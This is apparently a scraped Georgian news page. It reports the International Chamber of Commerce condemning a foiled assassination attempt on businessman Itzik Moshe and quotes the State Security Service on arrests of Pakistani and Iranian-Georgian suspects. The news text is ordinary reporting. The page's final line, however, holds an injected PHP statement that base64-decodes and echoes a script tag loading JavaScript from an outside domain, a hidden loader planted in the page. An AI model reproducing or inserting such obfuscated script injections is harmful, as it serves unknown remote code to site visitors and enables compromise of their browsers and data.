celsiusi
ავერსი შნაიდერი
საერთაშორისო სავაჭრო პალატა მკაცრად გმობს ისრაელ-საქართველოს ბიზნეს პალატის პრეზიდენტის, ICC Georgia-ს მაღალი რანგის წევრის, იციკ მოშეს მკვლელობის მცდელობას, - ამის შესახებ სავაჭრო პალატის მიერ გავრცელებულ განცხადებაშია ნათქვამი.
 
საქმე ის არის, რომ არსებული ინფორმაციით, ბიზნესმენი, ვისი მკვლელობის მცდელობაც სახელმწიფო უსაფრთხოების სამსახურმა აღკვეთა, იციკ მოშეა.
 
ბიზნესმენი სოციალურ ქსელში განცხადებასაც ავრცელებს: „გმადლობთ მხარდაჭერისთვის. მადლობა ისრაელის სახელმწიფოს პრეზიდენტს, იცხაკ ჰერცოგს გამამხნევებელი სიტყვებისათვის, მხარდაჭერისთვის და რა თქმა უნდა დიდი მადლობა საქართველოს უსაფრთხოების სამსახურს ტერაქტის გამოაშკარავებისა და ჩაშლისათვის. სამუშაო და საქმე ბევრია. ჩვენ ვაგრძელებთ და ვემზადებით ახალი სამუშაო დღისთვის“.
 
თავის მხრივ, საერთაშორისო სავაჭრო პალატის საბჭოს თავმჯდომარე ფადი ასლი აცხადებს, რომ „იციკ მოშე წლებია იბრძვის საქართველოში ბიზნესისა და საინვესტიციო კლიმატის გაუმჯობესებისა და ქართველი ხალხის ცხოვრების დონის ამაღლებისთვის; ის არის ბიზნეს საზოგადოების უაღრესად პატივსაცემი წევრი და დიდი ქველმოქმედი, ეს მკვლელობის მცდელობა არის ყველა პასუხისმგებლიანი ბიზნესისა და ქვეყნის სტაბილურობის წინააღმდეგ მიმართული".
 
საერთაშორისო სავაჭრო პალატა გმობს ყველანაირ ტერორისტულ აქტს და მადლობას უხდის საქართველოს სამართალდამცავ ორგანოებს მკვლელობის მცდელობის დროული აღკვეთისთვის.
 
შეგახსენებთ: გუშინ სუს-მა გაავრცელა ინფორმაცია, რომ დაკავებული არიან პაკისტანისა და ირან-საქართველოს ორმაგი მოქალაქეობის მქონე პირები. იდენტიფიცირებული არიან უცხოეთში მყოფი ორგანიზატორები, მათ შორის დადგენილი არიან მკვლელობის სავარაუდო შემკვეთი ირანის მოქალაქე და სხვა მონაწილე პირები, რომელთა მიმართ მიმდინარეობს კომპლექსური ოპერატიულ-სამძებრო ღონისძიებები.
 
„გამოძიებით დადგენილია, რომ დანაშაულებრივი ჯგუფის მიერ საქართველოში გამოიგზავნა ამ ჯგუფში ჩართული პაკისტანის მოქალაქე, რომელსაც დავალებული ჰქონდა საქართველოში ისრაელის მოქალაქის მკვლელობა.
 
საქართველოში ჩამოსვლამდე პაკისტანის მოქალაქეს ჩაუტარდა საჭირო ინსტრუქტაჟი და მიეწოდა ინფორმაცია მკვლელობის ობიექტზე. მოგვიანებით, ხსენებული პირი მესამე ქვეყნის გავლით ჩამოვიდა საქართველოში, სადაც მას დახვდა დაქირავებული ბინა და გადაეცა კონსპირაციული კავშირის საშუალებები.
 
საქართველოში ჩამოსვლის შემდეგ პაკისტანის მოქალაქე მკაცრად იცავდა კონსპირაციის წესებს და ახორციელებდა მკვლელობის ობიექტისა და მისი გადაადგილების მარშრუტების ფარულ შესწავლას, მუდმივ კონსპირაციულ კავშირზე იმყოფებოდა უცხოეთში მყოფ შემკვეთთან და იღებდა მისგან მითითებებს და თანხებს.
 
დამატებით დადგინდა, რომ მკვლელობის შემსრულებლისთვის იარაღის ფარულად მიწოდების მიზნით, დანაშაულებრივმა ჯგუფმა საქმეში ჩართო საქართველოში მცხოვრები ირან-საქართველოს ორმაგი მოქალაქეობის მქონე პირებისგან შემდგარი ჯგუფი.
 
კვალის დასაფარად პაკისტანისა და ირან-საქართველოს ორმაგი მოქალაქეობის მქონე პირებს შორის პირდაპირი შეხვედრები არ ხორციელდებოდა და ცეცხლსასროლი იარაღებისა და საბრძოლო მასალის გადაცემა ხდებოდა ქალაქში მოწყობილი სამალავების გამოყენებით, რა დროსაც ორივე ჯგუფის მუშაობის კოორდინაცია უცხოეთიდან ხორციელდებოდა.
 
პაკისტანისა და ირან-საქართველოს ორმაგი მოქალაქეობის მქონე პირების მიმართ ჩატარებული საგამოძიებო მოქმედებების - ჩხრეკების შედეგად ამოღებულ იქნა ცეცხლსასროლი იარაღი და საბრძოლო მასალა, ასევე, კონსპირაციული ტელეფონები, რომლებშიც აღმოჩენილია როგორც მკვლელობის მომზადებისა და სამალავების ადგილმდებარეობის ამსახველი ინფორმაცია, ასევე სხვა მამხილებელი მტკიცებულებები.
 
საქმეზე მიმდინარე ოპერატიული და საგამოძიებო ღონისძიებების პროცესში ხორციელდება დანაშაულში მონაწილე და ხელშემწყობი სხვა პირების გამოვლენა და იდენტიფიცირება“, - ნათქვამია სუს-ის განცხადებაში.
იციკ მოშე
474
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");